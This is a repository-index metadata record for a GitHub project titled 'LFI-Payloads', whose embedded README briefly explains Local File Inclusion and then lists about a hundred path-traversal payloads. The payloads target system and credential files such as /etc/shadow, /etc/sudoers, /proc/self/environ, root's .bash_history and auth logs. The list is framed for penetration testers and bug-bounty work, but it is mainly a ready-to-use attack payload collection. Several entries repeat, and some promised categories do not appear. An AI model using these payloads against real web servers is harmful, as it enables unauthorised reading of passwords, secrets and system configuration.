{"id":26347219,"url":"https://github.com/yogsec/lfi-payloads","last_synced_at":"2026-01-03T06:08:31.674Z","repository":{"id":281945607,"uuid":"946967373","full_name":"yogsec/LFI-Payloads","owner":"yogsec","description":"LFI Payloads - A comprehensive collection of Local File Inclusion (LFI) payloads for security researchers and penetration testers. This repository includes common, advanced, and bypass techniques to help identify and exploit LFI vulnerabilities effectively.","archived":false,"fork":false,"pushed_at":"2025-03-12T01:04:39.000Z","size":0,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-12T01:27:33.764Z","etag":null,"topics":["bug-bounty-cheatsheet","bug-hunting-tools","cybersecurity","cybersecurity-cheatsheet","cybersecurity-payloads","lfi-payload","lfi-payloads","lfi-payloads-list","local-file-inclusion","local-file-inclusion-payloads"],"latest_commit_sha":null,"homepage":"https://linktr.ee/yogsec","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yogsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["yogsec"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"lfx_crowdfunding":null,"polar":null,"buy_me_a_coffee":null,"thanks_dev":null,"custom":null}},"created_at":"2025-03-12T00:32:31.000Z","updated_at":"2025-03-12T01:04:43.000Z","dependencies_parsed_at":"2025-03-12T01:37:36.793Z","dependency_job_id":null,"html_url":"https://github.com/yogsec/LFI-Payloads","commit_stats":null,"previous_names":["yogsec/lfi-payloads"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yogsec","download_url":"https://codeload.github.com/yogsec/LFI-Payloads/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243835926,"owners_count":20355616,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty-cheatsheet","bug-hunting-tools","cybersecurity","cybersecurity-cheatsheet","cybersecurity-payloads","lfi-payload","lfi-payloads","lfi-payloads-list","local-file-inclusion","local-file-inclusion-payloads"],"created_at":"2025-03-16T07:16:15.469Z","updated_at":"2026-01-03T06:08:31.669Z","avatar_url":"https://github.com/yogsec.png","language":null,"funding_links":["https://github.com/sponsors/yogsec"],"categories":[],"sub_categories":[],"readme":"# šŸš€ LFI Payloads\n\nWelcome to **LFI Payloads**! This repository is designed to help security researchers and penetration testers identify and exploit **Local File Inclusion (LFI)** vulnerabilities with effective payloads. šŸ›”ļø\n\u003cdiv align=\"center\"\u003e\n \u003ca href=\"https://www.whatsapp.com/channel/0029Vb68FeRFnSzGNOZC3h3x\"\u003e\u003cimg src=\"https://img.shields.io/static/v1?style=for-the-badge\u0026amp;message=WhatsApp+Channel\u0026amp;color=25D366\u0026amp;logo=\u0026amp;logoColor=FFFFFF\u0026amp;label=\" alt=\"WhatsApp Channel\"\u003e\u003c/a\u003e\n \u003ca href=\"https://t.me/HackerSecure\"\u003e\u003cimg src=\"https://img.shields.io/static/v1?style=for-the-badge\u0026amp;message=Telegram+Channel\u0026amp;color=24A1DE\u0026amp;logo=\u0026amp;logoColor=FFFFFF\u0026amp;label=\" alt=\"Telegram Channel\"\u003e\u003c/a\u003e\n \u003ca href=\"https://www.linkedin.com/in/cybersecurity-pentester/\"\u003e\u003cimg src=\"https://img.shields.io/static/v1?style=for-the-badge\u0026amp;message=LinkedIn\u0026amp;color=0A66C2\u0026amp;logo=LinkedIn\u0026amp;logoColor=FFFFFF\u0026amp;label=\" alt=\"LinkedIn\"\u003e\u003c/a\u003e\n \u003ca href=\"https://linktr.ee/yogsec\"\u003e\u003cimg src=\"https://img.shields.io/static/v1?style=for-the-badge\u0026amp;message=LinkTree\u0026amp;color=25D366\u0026amp;logo=\u0026amp;logoColor=FFFFFF\u0026amp;label=\" alt=\"WhatsApp Channel\"\u003e\u003c/a\u003e\n \u003ca href=\"https://x.com/home\"\u003e\u003cimg src=\"https://img.shields.io/static/v1?style=for-the-badge\u0026amp;message=X\u0026amp;color=000000\u0026amp;logo=\u0026amp;logoColor=FFFFFF\u0026amp;label=\" alt=\"Lichess\"\u003e\u003c/a\u003e\n \u003ca href=\"mailto:abhinavsingwal@gmail.com?subject=Hi%20YogSec%20,%20nice%20to%20meet%20you!\"\u003e\u003cimg alt=\"Email\" src=\"https://img.shields.io/static/v1?style=for-the-badge\u0026amp;message=Gmail\u0026amp;color=EA4335\u0026amp;logo=Gmail\u0026amp;logoColor=FFFFFF\u0026amp;label=\"\u003e\u003c/a\u003e\n \u003ca href=\"https://yogsec.github.io/yogsec/\"\u003e\u003cimg src=\"https://img.shields.io/static/v1?style=for-the-badge\u0026amp;message=Website\u0026amp;color=FFFFC5\u0026amp;logo=\u0026amp;logoColor=FFFFFF\u0026amp;label=\" alt=\"Telegram Channel\"\u003e\u003c/a\u003e \n \n\u003c/div\u003e\n\n---\n\n## šŸ“‚ What is LFI?\n**Local File Inclusion (LFI)** is a web vulnerability that allows an attacker to include files on a server through the web browser. This can potentially lead to:\n\n- šŸ•µļøā€ā™‚ļø Information Disclosure\n- šŸ Code Execution\n- šŸ”„ Server Compromise\n\n---\n\n## šŸ“œ Payloads\nThis repository contains various payloads categorized for easy access:\n\nāœ… **Basic Payloads** \nāœ… **Encoding Techniques** \nāœ… **Traversal Techniques** \nāœ… **Wrapper Bypass** \nāœ… **PHP Filters** \nāœ… **Log Poisoning Payloads**\n\n### šŸ”„ 100 Common LFI Payloads\n```\n?page=../../../../etc/passwd\n?page=../../../../etc/hosts\n?page=../../../../windows/win.ini\n?page=../../../../boot.ini\n?page=../../../../etc/shadow\n?page=../../../../etc/group\n?page=../../../../proc/self/environ\n?page=../../../../var/log/apache2/access.log\n?page=../../../../var/log/apache2/error.log\n?page=../../../../var/log/httpd/access.log\n?page=../../../../var/log/httpd/error.log\n?page=../../../../usr/local/apache/logs/access_log\n?page=../../../../usr/local/apache/logs/error_log\n?page=../../../../var/lib/mysql/mysql.sock\n?page=../../../../etc/httpd/httpd.conf\n?page=../../../../etc/apache2/apache2.conf\n?page=../../../../etc/httpd/conf/httpd.conf\n?page=../../../../etc/httpd/conf.d/vhosts.conf\n?page=../../../../etc/nginx/nginx.conf\n?page=../../../../etc/nginx/sites-enabled/default\n?page=../../../../etc/ssl/openssl.cnf\n?page=../../../../var/www/html/index.php\n?page=../../../../home/user/.bash_history\n?page=../../../../root/.bash_history\n?page=../../../../etc/issue\n?page=../../../../etc/network/interfaces\n?page=../../../../etc/resolv.conf\n?page=../../../../etc/hostname\n?page=../../../../etc/hosts.allow\n?page=../../../../etc/hosts.deny\n?page=../../../../etc/security/opasswd\n?page=../../../../etc/mtab\n?page=../../../../etc/fstab\n?page=../../../../etc/sudoers\n?page=../../../../etc/pam.conf\n?page=../../../../etc/profile\n?page=../../../../etc/shells\n?page=../../../../etc/inittab\n?page=../../../../etc/passwd-\n?page=../../../../etc/group- \n?page=../../../../etc/shadow- \n?page=../../../../etc/gshadow- \n?page=../../../../var/backups/passwd\n?page=../../../../var/backups/group\n?page=../../../../var/backups/shadow\n?page=../../../../var/backups/gshadow\n?page=../../../../dev/mem\n?page=../../../../dev/kmem\n?page=../../../../dev/port\n?page=../../../../proc/mounts\n?page=../../../../proc/partitions\n?page=../../../../proc/version\n?page=../../../../proc/self/status\n?page=../../../../proc/self/cmdline\n?page=../../../../proc/self/fd\n?page=../../../../proc/self/maps\n?page=../../../../proc/self/mountinfo\n?page=../../../../proc/self/io\n?page=../../../../proc/self/limits\n?page=../../../../proc/self/cgroup\n?page=../../../../proc/self/net/tcp\n?page=../../../../proc/self/net/udp\n?page=../../../../proc/self/net/raw\n?page=../../../../proc/self/net/unix\n?page=../../../../proc/self/net/snmp\n?page=../../../../proc/self/net/dev\n?page=../../../../proc/self/net/ip_conntrack\n?page=../../../../proc/self/net/route\n?page=../../../../proc/self/net/arp\n?page=../../../../proc/self/net/fib_trie\n?page=../../../../proc/self/net/netfilter\n?page=../../../../var/run/utmp\n?page=../../../../var/log/wtmp\n?page=../../../../var/log/btmp\n?page=../../../../var/log/lastlog\n?page=../../../../var/run/utmpx\n?page=../../../../var/log/wtmpx\n?page=../../../../var/log/btmpx\n?page=../../../../var/log/faillog\n?page=../../../../var/log/auth.log\n?page=../../../../var/log/secure\n?page=../../../../var/log/messages\n?page=../../../../var/log/syslog\n?page=../../../../var/log/kern.log\n?page=../../../../var/log/maillog\n?page=../../../../var/log/yum.log\n?page=../../../../var/log/dpkg.log\n?page=../../../../var/log/apt/history.log\n?page=../../../../var/log/apt/term.log\n?page=../../../../var/log/aptitude\n?page=../../../../var/log/boot.log\n?page=../../../../var/log/cron\n?page=../../../../var/log/daemon.log\n?page=../../../../var/log/debug\n?page=../../../../var/log/lpr.log\n?page=../../../../var/log/user.log\n?page=../../../../var/log/xferlog\n?page=../../../../var/log/mail.info\n?page=../../../../var/log/mail.warn\n?page=../../../../var/log/mail.err\n?page=../../../../var/log/httpd/access.log\n?page=../../../../var/log/httpd/error.log\n?page=../../../../var/log/apache2/access.log\n?page=../../../../var/log/apache2/error.log\n```\n\n---\n\n## āš™ļø Usage\n1. Clone the repository:\n ```bash\n git clone https://github.com/your-username/LFI-Payloads.git\n ```\n2. Navigate to the folder:\n ```bash\n cd LFI-Payloads\n ```\n3. Use the categorized payloads as per your testing requirements.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Flfi-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyogsec%2Flfi-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Flfi-payloads/lists"}